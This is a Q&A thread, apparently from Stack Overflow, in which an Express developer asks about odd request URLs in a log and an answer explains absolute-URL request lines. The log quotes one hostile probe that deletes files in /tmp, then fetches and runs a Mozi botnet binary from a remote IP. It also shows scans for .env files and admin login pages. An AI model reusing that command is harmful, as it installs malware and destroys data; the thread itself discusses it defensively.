# How can expressjs req.url path be another url?

Tags: javascript, node.js, express, security, websecurity

I recently found suspicious requests being made to my node-express server. So I wrote a middleware to log the request urls. Did log a lot of suspicious request paths most starting with '/', however some paths are actually another url.  how is this possible in express request ?
I tried to search on this but have not found anything. Could these request compromise the security of the node server. (eg. the req.url showing as  http://icanhazip.com/ )

My **log.txt** file

```
/wp-content/
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
/shell?cd+/tmp;rm+-rf+*;wget+http://AN_IP_WAS_HERE:40222/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
/.env
/.env
http://example.com/<-- how is this possible in express request ?
/boaform/admin/formLogin
http://icanhazip.com/  <-- how is this possible in express request ?
```

Code used to log requests

```
app.use((req,res,next) => {
    var isvalid = true;

    //some validation code here

    if(!isvalid){
        fs.appendFileSync("./log.txt", "\r\n"+ req.url);
        res.send("...");
    } else next();
});
```

Answer (score 1, accepted):

> how is this possible in express request ?

A really basic HTTP request looks like this:

```
GET /your/path HTTP/1.1
```

And any normal client is going to put a sensible path there.

If you're writing your own client, or constructing the request by hand (e.g. by typing into a telnet client connected to the HTTP port) then you can write whatever you like there:

```
GET http://example.com/ HTTP/1.1
```

> Could these request compromise the security of the node server.

Generally not. They are looking for a security hole to exploit. Don't do insecure things with user input and stay up to date with security patches for modules you depend on and you'll be fine.

Comment: Wow. Thank you Quentin  for explanation.  I was able to reproduce it with openssl.